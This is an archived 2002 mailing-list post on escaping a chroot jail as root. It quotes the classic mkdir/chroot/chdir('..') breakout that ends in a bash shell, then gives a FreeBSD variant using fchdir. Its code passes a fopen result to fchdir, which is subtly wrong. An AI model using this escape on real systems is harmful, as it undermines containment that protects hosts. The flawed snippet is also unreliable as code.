Hi, > But If you are able to run code as root, a few syscalls are still available to you : > inserting modules and ptrace(). > If you're able to run code as root, all you need, in most Un*x systems, > is: > mkdir("blah"); > chroot("blah"); > chdir("../../../../../../"); > chroot("."); > execl("/bin/bash", "bash", NULL); > On others Un*x systems, like some BSDs, an implicit chdir(".") is always > made after a chroot, so this doesn't work, but you can still do mknod(2), > mount(2), etc.. To start working and prevent this "bug" :) in FreeBSD you can do the following: mkdir("blah"); f = fopen("./afile", "w+"); chroot("blah"); fchdir(f); <== this will prevent the "bug" for(int i=0; i<10000; i++) chdir(".."); chroot("."); Of course, you can enchance the above code to be more efficient just by checking the chdir result. Regards, Nelson Junior nelsonat_private nelsonat_private
This archive was generated by hypermail 2b30 : Fri May 24 2002 - 17:24:33 PDT